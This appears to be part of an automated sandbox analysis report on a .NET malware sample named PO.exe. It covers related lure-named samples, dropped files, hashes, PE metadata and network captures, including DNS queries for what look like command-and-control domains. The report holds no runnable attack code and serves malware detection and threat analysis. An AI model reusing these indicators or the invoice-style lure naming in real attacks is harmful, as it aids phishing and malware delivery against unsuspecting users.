	SecuriteInfo.com.W32.AIDetect.malware1.19715.exe	Get hash	malicious	Browse	195.201.225.248
	toolspab2.exe	Get hash	malicious	Browse	195.201.225.248
	p96tm6y3yo.exe	Get hash	malicious	Browse	116.203.98.215
	gePWRo7op0.exe	Get hash	malicious	Browse	195.201.225.248
	u0r63PfgIe.exe	Get hash	malicious	Browse	195.201.225.248
EGIHOSTINGUS	Contract Agreement.exe	Get hash	malicious	Browse	142.111.179.147
	s6G3ZtvHZg.exe	Get hash	malicious	Browse	142.111.76.118
	g2qwgG2xbe.exe	Get hash	malicious	Browse	142.111.47.2
	winlog.exe	Get hash	malicious	Browse	104.252.75.179
	1ucvVfbHnD.exe	Get hash	malicious	Browse	142.111.47.2
	PO#560.zip.exe	Get hash	malicious	Browse	50.118.194.26
	PO4308.exe	Get hash	malicious	Browse	104.164.33.210
	PO7321.exe	Get hash	malicious	Browse	104.164.33.210
	SAKKAB QUOTATION_REQUEST.exe	Get hash	malicious	Browse	107.164.194.71
	RFQ-V-SAM-0321D056-DOC.exe	Get hash	malicious	Browse	104.252.75.179
	RFQ-415532-Refractory Materials for KNPC PROJECT_Tender in Kuwait...xlsx.exe	Get hash	malicious	Browse	107.165.116.66
	Request an Estimate_2021_04_01.exe	Get hash	malicious	Browse	107.186.223.220
	PO PL.exe	Get hash	malicious	Browse	107.186.125.46
	PO#7689.zip.exe	Get hash	malicious	Browse	50.118.194.26
	2021-04-01.exe	Get hash	malicious	Browse	107.186.80.12
	PI.exe	Get hash	malicious	Browse	104.252.75.130
	Inquiry.docx	Get hash	malicious	Browse	50.118.194.27
	BL Draft copy.exe	Get hash	malicious	Browse	107.186.80.9
	g0g865fQ2S.exe	Get hash	malicious	Browse	142.111.47.2
	FTT103634332.exe	Get hash	malicious	Browse	50.117.53.247

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Payment Advice.jpg.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	PO_6620200947535257661_Arabico.PDF.exe	Get hash	malicious	Browse
	Khay11iwV6.exe	Get hash	malicious	Browse
	OrderRequest29032021_BituChemLtd.exe	Get hash	malicious	Browse
	CL746713-6231150.exe	Get hash	malicious	Browse
	QG8y26K6ef.exe	Get hash	malicious	Browse
	DOC8743340924789.exe	Get hash	malicious	Browse
	PO_6620200947535257659_Arabico.PDF.exe	Get hash	malicious	Browse
	DARWISH TRADING PROFILE copy.exe	Get hash	malicious	Browse
	RFQ_38463846393646388368364834.exe	Get hash	malicious	Browse
	Company profile.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	Doc_3847468364836483638463,pdf.exe	Get hash	malicious	Browse
	J3RZHj0FIu.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PWS.Siggen2.61833.4196.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PWS.Siggen2.61912.12941.exe	Get hash	malicious	Browse
	Done.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.45865428.31596.exe	Get hash	malicious	Browse
	Shipping _doc_pdf scan 0094775885895.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log Download File
Process:	C:\Users\user\Desktop\PO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1402
Entropy (8bit):	5.338819835253785
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKoesXE8:MIHK5HKXE1qHxvbHK5AHKzvRYHKhQnoe
MD5:	1B32E71ED0326337C6593D13A55E54F4
SHA1:	0452CD9E26B6C35A3D186FD6DDB1B3365AFDB16C
SHA-256:	047E61E1F57F4922CA346203710E828859BB61800D9A72C2E64092EBB218CCA8
SHA-512:	1B5BF6D43F14FFEC6A58366222F606CB9EA1781E9E4A7E6F340E9982DD82F296ACA693EA94105F78705C01D254A7B7897050C7289CC942122C7B83221CC15DAA
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co

C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Download File
Process:	C:\Users\user\Desktop\PO.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42080
Entropy (8bit):	6.2125074198825105
Encrypted:	false
SSDEEP:	384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
MD5:	F2A47587431C466535F3C3D3427724BE
SHA1:	90DF719241CE04828F0DD4D31D683F84790515FF
SHA-256:	23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
SHA-512:	E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Payment Advice.jpg.exe, Detection: malicious, Browse Filename: PO.exe, Detection: malicious, Browse Filename: PO_6620200947535257661_Arabico.PDF.exe, Detection: malicious, Browse Filename: Khay11iwV6.exe, Detection: malicious, Browse Filename: OrderRequest29032021_BituChemLtd.exe, Detection: malicious, Browse Filename: CL746713-6231150.exe, Detection: malicious, Browse Filename: QG8y26K6ef.exe, Detection: malicious, Browse Filename: DOC8743340924789.exe, Detection: malicious, Browse Filename: PO_6620200947535257659_Arabico.PDF.exe, Detection: malicious, Browse Filename: DARWISH TRADING PROFILE copy.exe, Detection: malicious, Browse Filename: RFQ_38463846393646388368364834.exe, Detection: malicious, Browse Filename: Company profile.exe, Detection: malicious, Browse Filename: PO.exe, Detection: malicious, Browse Filename: Doc_3847468364836483638463,pdf.exe, Detection: malicious, Browse Filename: J3RZHj0FIu.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PWS.Siggen2.61833.4196.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PWS.Siggen2.61912.12941.exe, Detection: malicious, Browse Filename: Done.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.45865428.31596.exe, Detection: malicious, Browse Filename: Shipping _doc_pdf scan 0094775885895.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................\|w......H........#...Q...................u.......................................0..K........-....i.......r...p.o....,....r...p.o....-.......o......o.....$........o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o....(+...o,.....&...(-...........3..@......R...s.....s....(....:.(/.....}P...J.{P....o0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.76217978174977
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO.exe
File size:	542208
MD5:	4bb710142c4fa183e24dbd3ce3c7b51d
SHA1:	64a659096deda60c37861ddc0d26d3bfb11cc0c7
SHA256:	4903d25c490e1b6c899c4fb9d3d3eb16d79c802245d4c2b667ff06f42724e358
SHA512:	7b157763a01bcfba0a66d026af138209a2b3fccd955e789158d39a5e4738491f8146c1894aceabae42e7e064b02314f098ea52351dcbd2f66feed2b8ee6acc35
SSDEEP:	12288:laRZszqqB3PQhPp5owXoJSq5Qbxn09z2Oe:tzqIgfobC909S
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m....................:...........X... ...`....@.. ....................................`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4858ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x13C6926D [Mon Jul 7 01:18:37 1980 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x858a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x86000	0x612	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x88000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x838f4	0x83a00	False	0.643192070275	data	6.77669868061	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x86000	0x612	0x800	False	0.349609375	data	3.63882954088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x88000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x860a0	0x388	data
RT_MANIFEST	0x86428	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018 =B3E94;GD4HDE2>7?E=?9<IG
Assembly Version	1.0.0.0
InternalName	PO.exe
FileVersion	9.14.18.23
CompanyName	=B3E94;GD4HDE2>7?E=?9<IG
Comments	@5<?5677JAJ46=E=
ProductName	44J43IA<E7EF<:<J4
ProductVersion	9.14.18.23
FileDescription	44J43IA<E7EF<:<J4
OriginalFilename	PO.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 14:44:01.719662905 CEST	49757	80	192.168.2.4	88.198.220.232
Apr 12, 2021 14:44:01.788974047 CEST	80	49757	88.198.220.232	192.168.2.4
Apr 12, 2021 14:44:01.792118073 CEST	49757	80	192.168.2.4	88.198.220.232
Apr 12, 2021 14:44:01.792294979 CEST	49757	80	192.168.2.4	88.198.220.232
Apr 12, 2021 14:44:01.859123945 CEST	80	49757	88.198.220.232	192.168.2.4
Apr 12, 2021 14:44:01.859483957 CEST	80	49757	88.198.220.232	192.168.2.4
Apr 12, 2021 14:44:01.859602928 CEST	80	49757	88.198.220.232	192.168.2.4
Apr 12, 2021 14:44:01.859725952 CEST	49757	80	192.168.2.4	88.198.220.232
Apr 12, 2021 14:44:01.859812975 CEST	49757	80	192.168.2.4	88.198.220.232
Apr 12, 2021 14:44:01.926632881 CEST	80	49757	88.198.220.232	192.168.2.4
Apr 12, 2021 14:44:06.965579033 CEST	49759	80	192.168.2.4	81.17.18.197
Apr 12, 2021 14:44:07.016638994 CEST	80	49759	81.17.18.197	192.168.2.4
Apr 12, 2021 14:44:07.016875029 CEST	49759	80	192.168.2.4	81.17.18.197
Apr 12, 2021 14:44:07.017080069 CEST	49759	80	192.168.2.4	81.17.18.197
Apr 12, 2021 14:44:07.069204092 CEST	80	49759	81.17.18.197	192.168.2.4
Apr 12, 2021 14:44:07.083889961 CEST	80	49759	81.17.18.197	192.168.2.4
Apr 12, 2021 14:44:07.084017992 CEST	80	49759	81.17.18.197	192.168.2.4
Apr 12, 2021 14:44:07.084131956 CEST	49759	80	192.168.2.4	81.17.18.197
Apr 12, 2021 14:44:07.084167004 CEST	49759	80	192.168.2.4	81.17.18.197
Apr 12, 2021 14:44:07.134614944 CEST	80	49759	81.17.18.197	192.168.2.4
Apr 12, 2021 14:44:12.321546078 CEST	49763	80	192.168.2.4	172.120.90.239
Apr 12, 2021 14:44:12.522766113 CEST	80	49763	172.120.90.239	192.168.2.4
Apr 12, 2021 14:44:12.522927046 CEST	49763	80	192.168.2.4	172.120.90.239
Apr 12, 2021 14:44:12.523111105 CEST	49763	80	192.168.2.4	172.120.90.239
Apr 12, 2021 14:44:12.727207899 CEST	80	49763	172.120.90.239	192.168.2.4
Apr 12, 2021 14:44:12.727238894 CEST	80	49763	172.120.90.239	192.168.2.4
Apr 12, 2021 14:44:12.727257013 CEST	80	49763	172.120.90.239	192.168.2.4
Apr 12, 2021 14:44:12.727279902 CEST	80	49763	172.120.90.239	192.168.2.4
Apr 12, 2021 14:44:12.727292061 CEST	80	49763	172.120.90.239	192.168.2.4
Apr 12, 2021 14:44:12.727500916 CEST	49763	80	192.168.2.4	172.120.90.239
Apr 12, 2021 14:44:12.727546930 CEST	49763	80	192.168.2.4	172.120.90.239
Apr 12, 2021 14:44:12.727669001 CEST	49763	80	192.168.2.4	172.120.90.239
Apr 12, 2021 14:44:22.947943926 CEST	49764	80	192.168.2.4	35.246.6.109
Apr 12, 2021 14:44:23.013540983 CEST	80	49764	35.246.6.109	192.168.2.4
Apr 12, 2021 14:44:23.013648987 CEST	49764	80	192.168.2.4	35.246.6.109
Apr 12, 2021 14:44:23.013834000 CEST	49764	80	192.168.2.4	35.246.6.109
Apr 12, 2021 14:44:23.079365969 CEST	80	49764	35.246.6.109	192.168.2.4
Apr 12, 2021 14:44:23.112587929 CEST	80	49764	35.246.6.109	192.168.2.4
Apr 12, 2021 14:44:23.112617016 CEST	80	49764	35.246.6.109	192.168.2.4
Apr 12, 2021 14:44:23.112770081 CEST	49764	80	192.168.2.4	35.246.6.109
Apr 12, 2021 14:44:23.112869024 CEST	49764	80	192.168.2.4	35.246.6.109
Apr 12, 2021 14:44:23.179826021 CEST	80	49764	35.246.6.109	192.168.2.4
Apr 12, 2021 14:44:28.537760019 CEST	49765	80	192.168.2.4	5.181.216.112
Apr 12, 2021 14:44:28.738585949 CEST	80	49765	5.181.216.112	192.168.2.4
Apr 12, 2021 14:44:28.738795042 CEST	49765	80	192.168.2.4	5.181.216.112
Apr 12, 2021 14:44:28.738830090 CEST	49765	80	192.168.2.4	5.181.216.112
Apr 12, 2021 14:44:28.939632893 CEST	80	49765	5.181.216.112	192.168.2.4
Apr 12, 2021 14:44:29.249324083 CEST	49765	80	192.168.2.4	5.181.216.112
Apr 12, 2021 14:44:29.489649057 CEST	80	49765	5.181.216.112	192.168.2.4
Apr 12, 2021 14:44:29.873827934 CEST	80	49765	5.181.216.112	192.168.2.4
Apr 12, 2021 14:44:29.873862028 CEST	80	49765	5.181.216.112	192.168.2.4
Apr 12, 2021 14:44:29.873955965 CEST	49765	80	192.168.2.4	5.181.216.112
Apr 12, 2021 14:44:29.873981953 CEST	49765	80	192.168.2.4	5.181.216.112

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 14:42:18.326673031 CEST	64646	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:18.341506958 CEST	65298	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:18.375377893 CEST	59123	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:18.375395060 CEST	53	64646	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:18.415648937 CEST	53	65298	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:18.426920891 CEST	53	59123	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:21.305354118 CEST	54531	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:21.365734100 CEST	53	54531	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:22.303026915 CEST	49714	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:22.351854086 CEST	53	49714	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:27.158451080 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:27.215617895 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:27.654678106 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:27.726892948 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:27.741704941 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:27.798748970 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:38.399488926 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:38.461764097 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:52.658833027 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:52.710298061 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 12, 2021 14:42:59.883271933 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:42:59.944680929 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:10.069865942 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:10.118788958 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:13.428188086 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:13.493645906 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:13.638102055 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:13.700251102 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:13.858711004 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:13.918509007 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:15.781455040 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:15.845271111 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:16.089979887 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:16.139188051 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:16.448321104 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:16.507122040 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:17.066649914 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:17.121779919 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:17.383078098 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:17.450237989 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:17.815967083 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:17.873720884 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:18.535752058 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:18.593535900 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:19.386559963 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:19.443630934 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:20.553845882 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:20.604923964 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:21.973670006 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:22.033448935 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:22.902383089 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:22.957165956 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:30.012734890 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:30.071494102 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:41.008186102 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:41.057065010 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:49.759149075 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:49.807861090 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:57.420022011 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:57.471882105 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:58.524750948 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:58.576957941 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 12, 2021 14:43:59.734992027 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:43:59.788009882 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:00.816592932 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:00.884073973 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:01.390639067 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:01.439263105 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:01.632924080 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:01.708024025 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:04.046782017 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:04.095602989 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:06.877645969 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:06.964396000 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:07.563872099 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:07.612555981 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:08.601608992 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:08.650274992 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:09.655905008 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:09.706682920 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:12.095752001 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:12.318901062 CEST	53	55916	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:17.759136915 CEST	52752	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:17.845458031 CEST	53	52752	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:22.862821102 CEST	60542	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:22.946855068 CEST	53	60542	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:28.138525009 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:28.536580086 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 12, 2021 14:44:34.270891905 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 12, 2021 14:44:34.368071079 CEST	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 14:44:01.632924080 CEST	192.168.2.4	8.8.8.8	0x8f05	Standard query (0)	www.marienish.com	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:06.877645969 CEST	192.168.2.4	8.8.8.8	0xbff7	Standard query (0)	www.wwwflixxy.com	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:12.095752001 CEST	192.168.2.4	8.8.8.8	0xb138	Standard query (0)	www.adanahabernet.com	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:17.759136915 CEST	192.168.2.4	8.8.8.8	0x2340	Standard query (0)	www.swpszx.com	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:22.862821102 CEST	192.168.2.4	8.8.8.8	0x617e	Standard query (0)	www.sidepiecebags.com	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:28.138525009 CEST	192.168.2.4	8.8.8.8	0x376e	Standard query (0)	www.mitraberdaya.com	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:34.270891905 CEST	192.168.2.4	8.8.8.8	0x6ec8	Standard query (0)	www.oaisdjoqwekxc.info	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 14:44:01.708024025 CEST	8.8.8.8	192.168.2.4	0x8f05	No error (0)	www.marienish.com		88.198.220.232	A (IP address)	IN (0x0001)
Apr 12, 2021 14:44:06.964396000 CEST	8.8.8.8	192.168.2.4	0xbff7	No error (0)	www.wwwflixxy.com		81.17.18.197	A (IP address)	IN (0x0001)
